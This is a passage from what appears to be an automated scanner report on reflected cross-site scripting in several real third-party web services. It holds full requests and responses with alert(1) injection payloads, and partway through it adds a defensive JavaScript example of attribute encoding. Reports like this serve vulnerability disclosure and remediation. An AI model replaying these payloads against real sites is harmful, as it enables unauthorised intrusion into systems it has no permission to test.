HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:41:40 GMT Server: Jetty(6.1.22) Content-Length: 464 Cache-Control: no-cache, no-store content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061008 (MII-APC/1.6)
var ftGUID_94537="1210EC55BB9841"; var ftConfID_94537="0"; var ftParams_94537="click=&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.62648372353fd9e"-alert(1)-"1376e3d3251"; var ftKeyword_94537=""; var ftSegment_94537=""; var ftSegmentList_94537=[]; var ftRuleMatch_94537="0";
The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71dab"-alert(1)-"4addb22c6fd was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=&ftadz=71dab"-alert(1)-"4addb22c6fd&ftscw=&cachebuster=602976.6264837235 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=1210EC55BB9841"
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:41:19 GMT Server: Jetty(6.1.22) Content-Length: 464 Cache-Control: no-cache, no-store content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061008 (MII-APC/1.6)
var ftGUID_94537="1210EC55BB9841"; var ftConfID_94537="0"; var ftParams_94537="click=&ftx=&fty=&ftadz=71dab"-alert(1)-"4addb22c6fd&ftscw=&cachebuster=602976.6264837235"; var ftKeyword_94537=""; var ftSegment_94537=""; var ftSegmentList_94537=[]; var ftRuleMatch_94537="0";
The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af48e"-alert(1)-"d29e837d092 was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=&ftadz=&ftscw=af48e"-alert(1)-"d29e837d092&cachebuster=602976.6264837235 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=1210EC55BB9841"
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:41:30 GMT Server: Jetty(6.1.22) Content-Length: 464 Cache-Control: no-cache, no-store content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061005 (MII-APC/1.6)
var ftGUID_94537="1210EC55BB9841"; var ftConfID_94537="0"; var ftParams_94537="click=&ftx=&fty=&ftadz=&ftscw=af48e"-alert(1)-"d29e837d092&cachebuster=602976.6264837235"; var ftKeyword_94537=""; var ftSegment_94537=""; var ftSegmentList_94537=[]; var ftRuleMatch_94537="0";
The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5368a"-alert(1)-"128e10b5eda was submitted in the ftx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=5368a"-alert(1)-"128e10b5eda&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=1210EC55BB9841"
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:40:51 GMT Server: Jetty(6.1.22) Cache-Control: no-cache, no-store Content-Length: 464 content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061006 (MII-APC/1.6)
var ftGUID_94537="1210EC55BB9841"; var ftConfID_94537="0"; var ftParams_94537="click=&ftx=5368a"-alert(1)-"128e10b5eda&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235"; var ftKeyword_94537=""; var ftSegment_94537=""; var ftSegmentList_94537=[]; var ftRuleMatch_94537="0";
The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84b00"-alert(1)-"cac21056698 was submitted in the fty parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=84b00"-alert(1)-"cac21056698&ftadz=&ftscw=&cachebuster=602976.6264837235 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=1210EC55BB9841"
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:41:07 GMT Server: Jetty(6.1.22) Content-Length: 464 Cache-Control: no-cache, no-store content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061001 (MII-APC/1.6)
var ftGUID_94537="1210EC55BB9841"; var ftConfID_94537="0"; var ftParams_94537="click=&ftx=&fty=84b00"-alert(1)-"cac21056698&ftadz=&ftscw=&cachebuster=602976.6264837235"; var ftKeyword_94537=""; var ftSegment_94537=""; var ftSegmentList_94537=[]; var ftRuleMatch_94537="0";
5.173. http://servedby.flashtalking.com/imp/3/14752 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://servedby.flashtalking.com
Path: /imp/3/14752
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be3a7"-alert(1)-"c5145c4eafe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235&be3a7"-alert(1)-"c5145c4eafe=1 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=1210EC55BB9841"
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:41:45 GMT Server: Jetty(6.1.22) P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript Cache-Control: no-cache, no-store pragma: no-cache Content-Length: 467 Via: 1.1 mdw061008 (MII-APC/1.6)
var ftGUID_94537="1210EC55BB9841"; var ftConfID_94537="0"; var ftParams_94537="click=&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235&be3a7"-alert(1)-"c5145c4eafe=1"; var ftKeyword_94537=""; var ftSegment_94537=""; var ftSegmentList_94537=[]; var ftRuleMatch_94537="0";
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 9663e<script>alert(1)</script>4a63942b3e0 was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/getApi.php?return=json&url=http%3A%2F%2Fwww.computerworlduk.com%2Fnews%2Fsecurity%2F3276305%2Foracle-responds-to-hacker-group-and-patches-javacom-vulnerability%2F%3Folo%3Drss&fpc=8f316ea-12f93c9a01d-4bc8d0c8-1&cb=initWidgetOnSuccess9663e<script>alert(1)</script>4a63942b3e0&service=initWidget HTTP/1.1 Host: wd.sharethis.com Proxy-Connection: keep-alive Referer: http://edge.sharethis.com/share4x/index.1f60cca3a67f69342fce2ed55af68ca9.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1; __uset=yes
The value of the FindingMethod request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 970be"style%3d"x%3aexpression(alert(1))"b6e0c02100b was submitted in the FindingMethod parameter. This input was echoed as 970be"style="x:expression(alert(1))"b6e0c02100b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the FindingMethod request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3b99"%3balert(1)//ee36c302041 was submitted in the FindingMethod parameter. This input was echoed as c3b99";alert(1)//ee36c302041 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the PromCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8a66"style%3d"x%3aexpression(alert(1))"2617e1b896b was submitted in the PromCode parameter. This input was echoed as a8a66"style="x:expression(alert(1))"2617e1b896b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the PromCode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbbd9"%3balert(1)//e1045719b6a was submitted in the PromCode parameter. This input was echoed as cbbd9";alert(1)//e1045719b6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
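The FindingMethod and PromCode attribute findings above share one context: a request parameter is written into a double-quoted HTML attribute value, and a double quote in the input ends the value so that the remainder (here `style="x:expression(...)"`) is parsed as a new attribute. The following is an added example, not code from the scanned application or from the report: a vulnerable rendering beside an attribute-encoded one, plus a small tokenizer that shows which attributes a browser would see in each. The form field, the encoder and the tokenizer are assumptions written for this illustration; the payload is the FindingMethod value from the report.

```javascript
// Added example, not code from the scanned application: reflecting a request
// parameter into a double-quoted HTML attribute, the context of the
// FindingMethod and PromCode attribute findings above. The form field, the
// encoder and the tokenizer are assumptions written for this illustration.

// Constructed input: the FindingMethod payload from the report, URL-decoded.
const ATTR_PAYLOAD = '970be"style="x:expression(alert(1))"b6e0c02100b';

// Vulnerable rendering: the value is pasted verbatim into the attribute, so the
// " in the input ends the value and style="..." becomes a second attribute.
function renderFieldVulnerable(value) {
  return `<input type="text" name="FindingMethod" value="${value}">`;
}

// Attribute encoder: the characters that can change the meaning of a quoted
// attribute value. & is included so the output cannot be mis-decoded as an
// entity, and ' so the same encoder is safe for single-quoted attributes.
function encodeHtmlAttribute(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderFieldSafe(value) {
  return `<input type="text" name="FindingMethod" value="${encodeHtmlAttribute(value)}">`;
}

// Minimal attribute tokenizer for one start tag, following the HTML rule that
// text after a closing quote starts a new attribute name even without a
// space. Returns the attribute names a browser would see, lower-cased.
function attributeNames(tag) {
  const inner = tag.replace(/^<[A-Za-z][^\s>]*\s*/, '').replace(/\s*\/?>$/, '');
  const attr = /([^\s=\/>"']+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  const names = [];
  let m;
  while ((m = attr.exec(inner)) !== null) {
    names.push(m[1].toLowerCase());
  }
  return names;
}
```

For the vulnerable rendering `attributeNames` returns type, name, value, style and a fifth junk attribute from the payload's tail; for the encoded rendering it returns only type, name and value, because every `"` in the payload has become `&quot;` and the value never closes early. The IE-only `expression()` trick is just what this scan used to prove execution; any attribute that takes a URL or an event handler would do once the quote is loose, so the fix is the encoding, not blocking `expression`.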
5.179. http://west.thomson.com/support/contact-us/default.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://west.thomson.com
Path: /support/contact-us/default.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fdea"style%3d"x%3aexpression(alert(1))"22c4a465138 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8fdea"style="x:expression(alert(1))"22c4a465138 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the FindingMethod request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54b8b"%3balert(1)//787512fed9c was submitted in the FindingMethod parameter. This input was echoed as 54b8b";alert(1)//787512fed9c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the PromCode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 749d9"%3balert(1)//72d68614b4 was submitted in the PromCode parameter. This input was echoed as 749d9";alert(1)//72d68614b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
5.182. https://west.thomson.com/support/customer-service/order-info.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://west.thomson.com
Path: /support/customer-service/order-info.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8613a"style%3d"x%3aexpression(alert(1))"bb1d1f56e32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8613a"style="x:expression(alert(1))"bb1d1f56e32 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 2ebca<script>alert(1)</script>6a2cf77656a was submitted in the callback parameter. This input was echoed unmodified in the application's response. Note that the response body below is a JSONP call in which the reflected value forms the callback expression itself, so before treating this as an HTML-context injection confirm the response Content-Type and whether the endpoint is ever loaded as a document rather than as a script.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /widget/Matrix2.do?domain=us-festivals&mode=concise&lat=25.7933333&long=-80.290556&startDate=4/30/2011&endDate=5/18/2011&callback=itandlEventsCallback2ebca<script>alert(1)</script>6a2cf77656a HTTP/1.1 Host: widget.needle.itasoftware.com Proxy-Connection: keep-alive Referer: http://matrix.itasoftware.com/view/details?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753; JSESSIONID=1AA23091BF71FF338221489D9F6C0ECD.ita1needle6-reader
itandlEventsCallback2ebca<script>alert(1)</script>6a2cf77656a({"results":[["The 16th Annual National Children\'s Theatre Festival","16th annual national childrens theatre festival the",[[["Actors\' Playhouse at the Miracle Theatre","actors playhouse at the mirac ...[SNIP]...
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 67881<script>alert(1)</script>d4ca36e90c2 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /buttons/count?url=http%3A//xss.cx/2011/04/26/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html67881<script>alert(1)</script>d4ca36e90c2 HTTP/1.1 Host: widgets.digg.com Proxy-Connection: keep-alive Referer: http://xss.cx/2011/04/26/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the panelId request parameter is copied into the HTML document as plain text between tags. The payload d0616<script>alert(1)</script>374cd424dc0 was submitted in the panelId parameter. This input was echoed unmodified in the application's response. Note that the response below is served as application/x-javascript and the value lands inside a double-quoted JavaScript string passed to insertPanel, so the <script> tags are not parsed as HTML in that context; the relevant check there is whether a double quote in the value is escaped.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /syndication/subscriber/InsertPanel.js?panelId=0ed14c91-dfd4-497f-b04b-3d371abe7a5ed0616<script>alert(1)</script>374cd424dc0 HTTP/1.1 Host: widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/list/most_popular User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 21:46:17 GMT Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Connection: close Content-Type: application/x-javascript;charset=UTF-8 Content-Length: 6119
function libReadyCallback() { var parent_node = document.getElementById(parentNodeId); WIDGETBOX.subscriber.Main.insertPanel("0ed14c91-dfd4-497f-b04b-3d371abe7a5ed0616<script>alert(1)</script>374cd424dc0", parent_node); }
The value of the 980251%22';944334 request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5aa12(a)acca7f1048c was submitted in the 980251%22';944334 parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?980251%22';9443345aa12(a)acca7f1048c HTTP/1.1 Host: www.allpages.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
5.187. http://www.allpages.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.allpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 84a26(a)d3d1371b61f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?980251%22';944334&84a26(a)d3d1371b61f=1 HTTP/1.1 Host: www.allpages.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the channel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68743"%3balert(1)//bb61ffcaafd was submitted in the channel parameter. This input was echoed as 68743";alert(1)//bb61ffcaafd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr68743"%3balert(1)//bb61ffcaafd&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the classification request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86e94"%3balert(1)//5616609a231 was submitted in the classification parameter. This input was echoed as 86e94";alert(1)//5616609a231 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply86e94"%3balert(1)//5616609a231&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... 7_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply86e94";alert(1)//5616609a231&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=&mvtkey=");
The value of the creative_desc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d075"%3balert(1)//51083a8fbe0 was submitted in the creative_desc parameter. This input was echoed as 7d075";alert(1)//51083a8fbe0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf7d075"%3balert(1)//51083a8fbe0&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the creative_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6605f"%3balert(1)//45adfdbe294 was submitted in the creative_id parameter. This input was echoed as 6605f";alert(1)//45adfdbe294 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
